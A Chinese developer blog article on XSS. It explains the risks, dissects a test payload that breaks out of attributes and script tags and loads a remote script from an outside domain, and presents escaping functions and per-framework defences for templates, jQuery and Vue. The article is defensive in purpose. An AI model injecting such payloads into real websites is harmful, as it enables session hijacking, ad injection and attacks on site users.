前端安全之xss攻击

更新日期: 2020-02-13阅读: 2.2k标签: 安全

前段时间公司网页被 xss 搞了一下,微信把域名封了,通宵搞了好几天。这两天把公司好几年来的代码都改了一遍,这工作丧心病狂


什么是 xss?

XSS 攻击指通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的代码。


危害有什么?

  1. 跳转到广告页面,页面注入广告等等。
  2. 导致公司域名被其他平台拉黑,从而使业务受损。
  3. 用户的财产受到威胁,他注入的代码可以在网页中任意请求接口。


注入代码

http://upcdn"'></script><script src="//www.lilnong.top/xss.js"></script><script>alert(12306)</script><svg></svg>\n\t\n

上面的代码是我们测试的时候使用的,接下来我们来分析一下这个代码主要用途。

  1. http://upcdn 这个字符串是用来伪装的。

    • <img src="${str}"> 动态拼接图片地址
    • <a href="${str}"> 动态跳转页面地址
  2. "'> 这两个就是为了截断当前字符串,然后闭合标签。

    • <img src="${str}">
  3. </script> 也是为了闭合标签,这个主要用在后台模板输出的时候。后台模板 velocity、freemarker 之类的。

    • <script>var imgUrl = ${str}</script>
  4. <script src="//www.lilnong.top/xss.js"></script> 就是引入一个js,这种方式比较常见。注入之后,攻击者只需要修改自己的文件,就可以更新了。
  5. <script>alert(12306)</script> 直接执行js代码
  6. <svg></svg> 注入一个元素,用于展示一个异常块打乱布局。比如 vue 中的 v-html 不会执行 script 标签中的内容,但是会显示 svg 图片。
  7. \n\t\n 是为了测试后台模板输出的场景。


防护场景及方案

后台模板

  1. toHtml 主要用于输出在页面(标签中)中,将用户输入的内容进行编码比如 <转换为&lt;。

    • <span>${nickanme}</span>
  2. toJS 主要用于输出在script标签中,这里需要防止打断js,比如处理成"'\n为\"\'\\n
  3. toUrl 这里其实和 toHtml 场景很像,但是需要判断url基础格式。

    • https://
    • //lilnong.top
    • /static
    • ./static
    • ../static

jquery&原生js

  1. toHtml 场景。jquery中基本上都是拼接一下,然后 .html 输出一下。这里需要做的也是把用户输入的做一下实体编码转换。
  2. toUrl 场景。校验一下url,然后 toHtml 或者 encode 都可以。

vue

  1. toHtml 场景。v-html 这里需要注意一下,尽可能不要使用,因为会导致注入问题。也可以toHtml一下,但是没必要不是吗。
  2. toUrl 场景。:href 主要 javascript:alert(1);这种场景,做url校验就可以。
  3. toHtml 场景。使用原生的方法,vue 中非要 innerHTML的那些人。


常见问题

富文本场景

  1. 文章那种,大量的标签,属性。这种一般需要后端处理。HTML Purifier
  2. 文字加表情,后者搜索高亮的场景。这种我们可以先执行toHtml,然后再匹配替换,最后在输出到页面即可。

换行符问题

有时我们在textarea中输入\n,渲染的时候空白符就被浏览器给吃了。针对这种情况,我们可以用下面的方案处理

  1. 通过 css 属性 white-space,或者 <pre> 标签
  2. 一般人们是正则替换.replace(/\n/g,'<br>),这种输出的时候万一里面有代码不就凉了吗。所以我们先 toHtml 然后在使用,这样可以防止注入问题。
  3. 其实 .innerText 可以自动把\n转换为<br>,你可以自己试试

代码实现

window.base = {
    toHtml: function (val) {
        if( typeof val != 'string' ) return '';
        var entityMap = {
            "&": "&amp;",
            "<": "&lt;",
            ">": "&gt;",
            '"': '&quot;',
            "'": '&#39;',
            "/": '&#x2F;'
        };
        return String(val).replace(/[&<>"'\/]/g, function (s) {
            return entityMap[s];
        });
    },
    toUrl: function (url) {
        if( typeof url != 'string' ) return '#';
        if(url.match(/^http/i)){
            return encodeURI(url)
        }
        return '#'
    },
};

链接: https://fly63.com/article/detial/8192

Web前端安全同样不可忽视,编写前端代码时保持安全意识

随着网络的普及,黑客进行网络攻击的手段越来也多,越来越复杂。前端的HTML、JavaScript、CSS、Flash等技术变成了前端攻击者和开发者的战场,网站安全问题也开始向前端倾斜。

AJAX请求真的不安全么?谈谈Web安全与AJAX的关系。

AJAX请求真的不安全么?AJAX请求哪里不安全?怎么样让AJAX请求更安全?本文包含的内容较多,包括AJAX,CORS,XSS,CSRF等内容,要完整的看完并理解需要付出一定的时间。

第三方 CSS 并不安全

第三方内容在其沙箱区域内具有强大的能力。如果你担心恶意用户诱使你的网站加载第三方资源,可以通过 CSP 用作防护手段,其可以限制加载图片,脚本和样式的来源。

WEB应用程序安全检查列表

检查页面隐藏或丢失的内容:检查webserver元数据文件,如:robots.txt, sitemap.xml,.DS_Store, .htaccess,检查搜索功能可能的注入或攻击方式,检查不同agent代理访问网站显示内容的是否一致

利用CSS注入(无iFrames)窃取CSRF令牌

要做到无iFrame,我将使用一种类似于之前我讨论过的方法:我将创建一个弹窗,然后在设置计时器后更改弹出窗口的位置。使用这种方法,我仍然可以加载受害者的CSS,但我不再依赖于受害者是否允许iFrame。

30 分钟理解 CORB 是什么

我当前的 chrome 版本是 v68,如果是 v66 或更低版本可能提示的警告信息略有不同。印象中只对 CORS 比较熟悉,CORB 是个什么鬼?好奇心迫使我想要了解一下它到底是什么,于是暂时把手头工作放下查了一些资料并花时间汇总了一下,就有了这篇文章

谈 target=‘_blank’的安全问题

大家都喜欢target=_blank, 因为新页面打开不影响原来的页面。但是这个存在安全问题, 由target=_blank打开的页面, 可以通过window.opener访问原来的窗口。遍可以简单的将网页导航到其他网站, 这就存在很多的安全隐患了, 比如钓鱼,这种问题解决起来也很简单, 在链接中加入rel=noreferrer noopener属性就可以了

Web安全测试检查单

Web安全测试检查单。上传功能:绕过文件上传检查功能,上传文件大小和次数限制。注册功能:注册请求是否安全传输,注册时密码复杂度是否后台检验,激活链接测试

一些安全相关的HTTP header

HTTP Strict-Transport-Security,简称为HSTS。X-Frame-Options:是否允许一个页面可在<frame>、<iframe>、<object>中展现的标记。X-XSS-Protection作用:防范XSS攻击。

第三方CSS安全吗?

第三方内容在其沙箱中具有很高的影响力。 虽然图像或沙盒iframe有着非常小的沙箱,但脚本和样式的作用范围却影响你的整个页面,甚至是整个站点。如果你担心用户会欺骗你的网站去加载第三方资源,可以使用CSP(内容安全策略)保证安全

点击更多...

内容以共享、参考、研究为目的,不存在任何商业目的。其版权属原作者所有,如有侵权或违规,请与小编联系!情况属实本人将予以删除!